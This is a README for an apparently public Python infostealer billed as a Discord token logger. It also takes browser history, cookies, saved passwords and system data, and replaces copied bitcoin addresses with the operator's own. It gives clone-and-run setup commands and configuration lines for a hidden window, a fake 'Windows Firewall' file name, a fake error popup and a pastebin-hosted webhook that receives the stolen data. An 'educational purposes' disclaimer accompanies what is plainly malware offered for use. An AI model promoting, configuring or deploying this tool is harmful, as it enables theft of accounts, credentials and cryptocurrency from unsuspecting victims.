
A free, efficient, and open-source discord token logger, that also grabs history, cookies, passwords, grabs computer data, fake error popup, and intercepts bitcoin addresses. This is purely for demonstration/educational purposes. I am not responsible for any actions you take with this project.


Depending on your python installation your commands may vary.
Below are the commands needed to set up.
The script was tested in python 3.8.6, on windows 10. This script only works on windows.

Setup Tutorial (click the image)

Video not working due to youtube taking it down


git clone https://github.com/LocalsGitHub/Discord-Info-Logger.git
cd Discord-Info-Logger
pip install -r requirements.txt
py TokenLogger.py


Once you have opened the script in your desired text editor, there are 3 lines that you can change.

# Configuration
debugger = False <--- Change this if you are having any issues with the logger. It will print any errors.
BTC_ADDRESS = '3LsZH7LqxJMZBaVU9YoTLk8HNnUcmzE88v' <--- Change this to your own bitcoin address.
pastebin = "https://pastebin.com/raw/id" <--- Change this to your own pastebin link that contains your webhook.
hiddenWindow = False <--- Set this to True or False. If you want the window to be hidden on execution then set this to True.
FakeFileName = "Windows Firewall" <--- Change this to the fake desired name.
fakeError = True  <--- Set this to True or False. If you want a fake error message to popup then set it to True.
fakeErrorMessage = "An unexpected error has occured."  <--- If you have fakeError enabled, change this to what you want the fake error popup to say.
fakeErrorTitle = "Oops!" <--- If you have fakeError enabled, change this to what you want the fake error popup title to say.


Create an issue, or message me on discord.

